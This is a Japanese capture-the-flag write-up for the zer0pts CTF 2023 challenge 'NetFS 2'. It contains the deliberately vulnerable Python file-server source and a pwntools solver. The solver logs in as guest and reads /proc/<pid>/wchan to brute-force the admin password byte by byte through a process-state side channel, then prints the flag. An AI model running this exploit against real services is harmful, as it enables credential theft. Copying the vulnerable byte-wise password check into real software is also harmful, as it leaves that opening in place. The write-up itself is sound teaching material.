- Source: zer0pts CTF 2023
- Author: ptr-yudai
NetFS 1の続編。パスワードが間違っていても5秒ほど待ってから切断されるようになった。
server.py
#!/usr/bin/env python3
import multiprocessing
import os
import random
import signal
import socket
import time
import re
# Location of the admin password, relative to the working directory.
PASSWORD_FILE = "secret/password.txt"

# Fail fast with an explicit exception: a bare ``assert`` would be stripped
# when the interpreter runs with -O.
if not os.path.isfile(PASSWORD_FILE):
    raise FileNotFoundError("Password file not found.")

# Maximum number of bytes of a file returned for a single request.
MAX_SIZE = 0x1000

# Read the password through a context manager so the handle is closed
# immediately instead of being left to the garbage collector.
with open(PASSWORD_FILE, "rb") as _password_file:
    _admin_password = _password_file.read().strip()

# username -> password, both as bytes (they are compared with raw socket data).
LOGIN_USERS = {
    b'guest': b'guest',
    b'admin': _admin_password,
}

# Path fragments that only the admin user may request.
PROTECTED = [b"server.py", b"secret"]

# The admin password must be a non-empty lowercase hex string.
if not re.fullmatch(b"[0-9a-f]+", LOGIN_USERS[b'admin']):
    raise ValueError("Admin password must be a non-empty lowercase hex string.")
class Timeout(object):
    """Context manager that bounds a block of code with a SIGALRM deadline.

    Entering the block installs ``handle_timeout`` as the SIGALRM handler and
    arms ``signal.alarm(seconds)``.  If the alarm fires while the body is
    still running, ``TimeoutError`` is raised from the handler.  Leaving the
    block cancels the alarm and then sleeps for a random fraction of a second.

    Args:
        seconds: Deadline in whole seconds (handed to ``signal.alarm``).
    """

    def __init__(self, seconds):
        self.seconds = seconds
        # Monotonic timestamp recorded by __enter__; None until then.
        self.start = None

    def handle_timeout(self, signum, frame):
        """SIGALRM handler: abort the guarded block.

        Raises:
            TimeoutError: always.
        """
        raise TimeoutError('Timeout')

    def wait(self):
        """Cancel the alarm and sleep until the full deadline has elapsed.

        After the deadline, an additional random delay of up to one second is
        added.  Must be called inside the ``with`` block.

        Raises:
            RuntimeError: if called before the context was entered.
        """
        if self.start is None:
            raise RuntimeError("Timeout.wait() called outside of a 'with' block")
        # The alarm must not interrupt the deliberate delay below.
        signal.alarm(0)
        # Use the monotonic clock: wall-clock adjustments (NTP steps, manual
        # changes) must not shorten or stretch the delay.
        while time.monotonic() - self.start < self.seconds:
            time.sleep(0.1)
        time.sleep(random.random())

    def __enter__(self):
        signal.signal(signal.SIGALRM, self.handle_timeout)
        signal.alarm(self.seconds)
        self.start = time.monotonic()
        return self

    def __exit__(self, _type, _value, _traceback):
        # Disarm the alarm so it cannot fire after the guarded block ended.
        signal.alarm(0)
        time.sleep(random.random())
class PyNetworkFS(object):
    """Per-connection handler: a login prompt followed by a file-read loop.

    Args:
        conn: Connected socket providing ``recv``, ``sendall`` and ``close``.
    """

    def __init__(self, conn):
        self._conn = conn
        self._auth = False
        self._user = None

    def __del__(self):
        self._conn.close()

    @property
    def is_authenticated(self):
        """True once ``authenticate`` has accepted a username/password pair."""
        return self._auth

    @property
    def is_admin(self):
        """True if the authenticated user is ``b'admin'``."""
        return self.is_authenticated and self._user == b'admin'

    def response(self, message):
        """Send *message* (bytes) to the client.

        ``sendall`` is used so that a short write cannot truncate the payload.
        """
        self._conn.sendall(message)

    def recvline(self):
        """Read one byte at a time up to a newline.

        Returns:
            The line without its trailing ``b'\\n'``, or ``None`` if the peer
            closed the connection before a newline arrived (any partial data
            is discarded).
        """
        line = bytearray()
        while True:
            byte = self._conn.recv(1)
            if byte == b'':
                return None
            if byte == b'\n':
                return bytes(line)
            line += byte

    def _reject(self, timer):
        """Pad the attempt to the full deadline, then report the failure."""
        timer.wait()
        self.response(b"Incorrect password.\n")

    def authenticate(self):
        """Login prompt.

        On success ``is_authenticated`` becomes true and the username is
        remembered.  On any failure the method simply returns.

        Raises:
            TimeoutError: if the client does not answer a prompt in time.
        """
        with Timeout(5):
            # Receive username
            self.response(b"Username: ")
            username = self.recvline()
            if username is None:
                return
            if username not in LOGIN_USERS:
                self.response(b"No such a user exists.\n")
                return
            password = LOGIN_USERS[username]

        with Timeout(5) as timer:
            # Receive password
            self.response(b"Password: ")
            # NOTE: the password is consumed one byte at a time and reading
            # stops at the first wrong byte (an empty read, i.e. EOF, also
            # counts as wrong).  This early exit is the behaviour the
            # accompanying writeup analyses, so it is kept as-is on purpose.
            for i in range(len(password)):
                if self._conn.recv(1) != password[i:i+1]:
                    self._reject(timer)
                    return
            if self._conn.recv(1) != b'\n':
                self._reject(timer)
                return

        self.response(b"Logged in.\n")
        self._auth = True
        self._user = username

    def serve(self):
        """Serve files.

        Repeatedly prompts for a path and sends back at most ``MAX_SIZE``
        bytes of that file, until the client disconnects.

        Raises:
            TimeoutError: when the 30 second session limit expires.
        """
        with Timeout(30):
            while True:
                # Receive filepath
                self.response(b"File: ")
                filepath = self.recvline()
                if filepath is None:
                    return

                # Check filepath
                if not self.is_admin and \
                   any(name in filepath for name in PROTECTED):
                    self.response(b"Permission denied.\n")
                    continue

                # Serve file
                try:
                    f = open(filepath, 'rb')
                except TimeoutError:
                    # Raised by the SIGALRM handler while open() was blocked;
                    # it must end the session, not be reported as a file error.
                    raise
                except FileNotFoundError:
                    self.response(b"File not found.\n")
                    continue
                except PermissionError:
                    self.response(b"Permission denied.\n")
                    continue
                except (OSError, ValueError):
                    # e.g. a directory, an over-long path, or an embedded NUL.
                    self.response(b"System error.\n")
                    continue

                with f:
                    try:
                        self.response(f.read(MAX_SIZE))
                    except TimeoutError:
                        # TimeoutError is an OSError subclass; let the session
                        # limit propagate instead of swallowing it below.
                        raise
                    except OSError:
                        self.response(b"System error.\n")
def pynetfs_main(conn):
    """Handle one client connection: authenticate, then serve files.

    Args:
        conn: Connected client socket.  It is closed before this function
            returns, whatever the outcome.
    """
    nfs = PyNetworkFS(conn)
    try:
        try:
            nfs.authenticate()
        except TimeoutError:
            nfs.response(b'Incorrect password.\n')

        if nfs.is_authenticated:
            try:
                nfs.serve()
            except TimeoutError:
                return
    except ConnectionError:
        # The client went away mid-conversation (broken pipe / reset);
        # nothing is left to do for this connection.
        return
    finally:
        # Close deterministically instead of relying on PyNetworkFS.__del__.
        conn.close()
if __name__ == '__main__':
    # Setup server
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
    sock.bind(('0.0.0.0', 10022))
    sock.listen(16)
    # Announce only after bind/listen succeeded.
    print("Listening on 0.0.0.0:10022")

    # Handle connection: one worker process per accepted client.
    ps = []
    while True:
        conn, addr = sock.accept()
        worker = multiprocessing.Process(target=pynetfs_main, args=(conn,))
        worker.start()
        ps.append(worker)
        # The worker holds its own copy of the socket; drop the parent's.
        conn.close()

        # Reap finished workers and keep only the ones still running.
        running = []
        for p in ps:
            if p.is_alive():
                running.append(p)
            else:
                p.join()
        ps = running
正しい文字を送った場合はプロセスが次の1バイトの入力待ち(recv)のままになる一方、間違った文字を送った場合はその時点で入力のreadが打ち切られてsleepに入る。この状態の違いをどうにかして外部から取得できれば、前問と同じように1文字ずつのブルートフォースでpasswordが求められる。
elif c != password[i:i+1]:
timer.wait()
self.response(b"Incorrect password.\n")
return
# Excerpt of Timeout.wait from server.py: what a login attempt does once a
# wrong password byte has been seen.
def wait(self):
# Cancel the pending SIGALRM so the delay below is not interrupted.
signal.alarm(0)
# Sleep in 0.1 s steps until `seconds` have passed since `start`.
while time.time() - self.start < self.seconds:
time.sleep(0.1)
# Extra random delay in [0, 1) seconds.
time.sleep(random.random())
これはプロセスの状態を見れば分かる。具体的には、`/proc/{pid}/wchan` を読むと、そのプロセスが「何の待ち状態になっているのか」(カーネル内のどの関数で待っているのか)を確認できる。
よって、guestでログインしてどうにかしてadminログイン試行中のプロセスのpidを特定し、そのプロセスの `wchan` を確認することで、パスワードが間違っているか否かを判断すれば良い。
現在の(guest側の)プロセスの情報は `/proc/self/` から分かるので、これをpid特定の手がかりにする。solverはこうなる。
from pwn import *
import time
host = "34.170.146.252"
port = 54172
# For a local instance of server.py use instead:
# host = "localhost"
# port = 10022

# disable info log
context.log_level = "error"

charset = "0123456789abcdef"
# Number of hex characters in the admin password.
PASSWORD_LENGTH = 16


def probe(candidate):
    """Return True if the server is still reading after *candidate* was sent.

    Opens a guest connection and, right after it, an admin connection.  The
    guest session reads its own pid from /proc/self/status and assumes the
    admin handler is pid + 1.  After *candidate* has been sent as the admin
    password (without newline), the guest reads /proc/<admin_pid>/wchan.

    Args:
        candidate: Password prefix to test (str of hex characters).

    Returns:
        True if the admin process is in "wait_woken" (still waiting for
        input, i.e. every byte so far matched); False otherwise, e.g.
        "hrtimer_nanosleep" after a wrong byte or a wrong pid guess.
    """
    p_guest = remote(host, port)
    try:
        time.sleep(0.1)
        p_admin = remote(host, port)
        try:
            # get pid
            p_guest.sendlineafter(b"Username: ", b"guest")
            p_guest.sendlineafter(b"Password: ", b"guest")
            p_guest.sendlineafter(b"File: ", b"/proc/self/status")
            p_guest.recvuntil(b"Pid:")
            admin_pid = int(p_guest.recvline().strip().decode()) + 1

            # bruteforce
            p_admin.recvuntil(b"Username:")
            p_admin.sendline(b"admin")
            p_admin.recvuntil(b"Password: ")
            p_admin.send(candidate.encode())
            # Give the server time to consume the bytes and settle.
            time.sleep(0.1)

            p_guest.sendlineafter(
                b"File: ", "/proc/{}/wchan".format(admin_pid).encode())
            # Read the whole reply, up to the next prompt, so a short read
            # cannot cut the symbol name in half.
            state = p_guest.recvuntil(b"File: ", drop=True)
        finally:
            p_admin.close()
    finally:
        p_guest.close()
    time.sleep(0.1)

    # if password is incorrect, process is in "hrtimer_nanosleep"
    # else, process is in "wait_woken"
    return b"wait_woken" in state


password = ""
while len(password) < PASSWORD_LENGTH:
    # If no candidate matches (e.g. the pid guess was off), the same
    # position is simply tried again on the next pass.
    for ch in charset:
        if probe(password + ch):
            password += ch
            print(password)
            break

p = remote(host, port)
try:
    p.sendlineafter(b"Username: ", b"admin")
    p.sendlineafter(b"Password: ", password.encode())
    p.sendlineafter(b"File: ", b"secret/flag.txt")
    print(p.recvline())
finally:
    p.close()
このsolverでは `admin_pid` を `guest_pid + 1` としているが、不特定多数のアクセスが飛んでくるCTF開催中のリモート環境では、必ずしも `admin_pid` と `guest_pid` が連続するとは限らないので、解けない(ことの方が多い)気がする。
とりあえず、AlpacaHackのリモート環境ではflagが得られた。
zer0pts{pr0cfs_1s_5uch_4_n1c3_0r4cl3_5d17c4e}